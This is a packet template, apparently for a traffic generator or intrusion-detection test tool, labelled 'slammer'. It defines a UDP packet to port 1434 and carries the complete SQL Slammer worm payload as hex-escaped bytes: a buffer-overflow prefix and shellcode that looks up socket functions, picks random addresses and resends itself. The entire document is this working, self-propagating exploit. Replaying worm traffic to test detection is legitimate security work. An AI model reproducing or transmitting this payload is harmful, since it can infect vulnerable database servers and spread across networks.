[ signature = "slammer",
  ip.version = 4,
  ip.src = south-american-ip,
  ip.dst = user-defined-ip,
  ip.protocol = 17,
  ip.ttl = 113,
  ip.id = 0xc543,
  ip.ihl = 5,
  udp.dst = 1434,
  udp.payload = "\x04\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\xdc\xc9\xb0\x42\xeb\x0e\x01\x01\x01\x01\x01\x01\x01\x70\xae\x42\x01\x70\xae\x42\x90\x90\x90\x90\x90\x90\x90\x90\x68\xdc\xc9\xb0\x42\xb8\x01\x01\x01\x01\x31\xc9\xb1\x18\x50\xe2\xfd\x35\x01\x01\x01\x05\x50\x89\xe5\x51\x68\x2e\x64\x6c\x6c\x68\x65\x6c\x33\x32\x68\x6b\x65\x72\x6e\x51\x68\x6f\x75\x6e\x74\x68\x69\x63\x6b\x43\x68\x47\x65\x74\x54\x66\xb9\x6c\x6c\x51\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x66\xb9\x65\x74\x51\x68\x73\x6f\x63\x6b\x66\xb9\x74\x6f\x51\x68\x73\x65\x6e\x64\xbe\x18\x10\xae\x42\x8d\x45\xd4\x50\xff\x16\x50\x8d\x45\xe0\x50\x8d\x45\xf0\x50\xff\x16\x50\xbe\x10\x10\xae\x42\x8b\x1e\x8b\x03\x3d\x55\x8b\xec\x51\x74\x05\xbe\x1c\x10\xae\x42\xff\x16\xff\xd0\x31\xc9\x51\x51\x50\x81\xf1\x03\x01\x04\x9b\x81\xf1\x01\x01\x01\x01\x51\x8d\x45\xcc\x50\x8b\x45\xc0\x50\xff\x16\x6a\x11\x6a\x02\x6a\x02\xff\xd0\x50\x8d\x45\xc4\x50\x8b\x45\xc0\x50\xff\x16\x89\xc6\x09\xdb\x81\xf3\x3c\x61\xd9\xff\x8b\x45\xb4\x8d\x0c\x40\x8d\x14\x88\xc1\xe2\x04\x01\xc2\xc1\xe2\x08\x29\xc2\x8d\x04\x90\x01\xd8\x89\x45\xb4\x6a\x10\x8d\x45\xb0\x50\x31\xc9\x51\x66\x81\xf1\x78\x01\x51\x8d\x45\x03\x50\x8b\x45\xac\x50\xff\xd6\xeb\xca" ]
